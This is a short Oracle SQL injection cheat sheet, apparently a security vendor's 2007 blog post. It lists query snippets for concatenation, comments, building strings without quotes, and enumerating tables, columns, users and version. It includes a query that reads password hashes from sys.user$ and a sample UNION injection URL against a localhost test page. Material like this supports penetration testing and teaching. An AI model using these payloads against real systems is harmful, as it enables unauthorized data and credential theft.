ORACLE SQL Injection Cheat Sheet

2-10-2007

Introduction

Quick and Dirty ORACLE SQL Injection Cheat Sheet which will be combined with main SQL Injection Cheat Sheet eventually. This cheat sheet can help you to get started for basic ORACLE SQL Injections.

ORACLE SQL Injection Notes

In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.

i.e. SELECT 'dummydata' || 'x' FROM DUAL;

You have to close comments if you used /* comment */ style comments

Concatenation

SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;

Comments

/* comment */

Note : You have to close this comments properly otherwise you'll get syntax error.

Line comment : --

Casting

For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;

Strings without quotes

SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;

Getting Stuff

Getting Tables

SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'

Getting Columns

SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'

Getting Current Database Name

SELECT global_name FROM global_name

Getting Users and Passwords

SELECT name, password FROM sys.user$ where type#=1

Getting version

Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'

Getting Current User

SELECT user FROM dual

Simple Union Query

http://127.0.0.1/sqlinjection/ora.php?id=-101%20UNION%20ALL%20SELECT%20(SELECT%20user%20FROM%20dual)%20FROM%20DUAL

Simulating SQL Server's TOP feature

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;

Moving Records one by one

SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;

Functions useful for Blind SQL Injetion

Doing outbound connections 

You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.

References, Papers & Credits

Document History

Recent Blog Posts

See all of the blog posts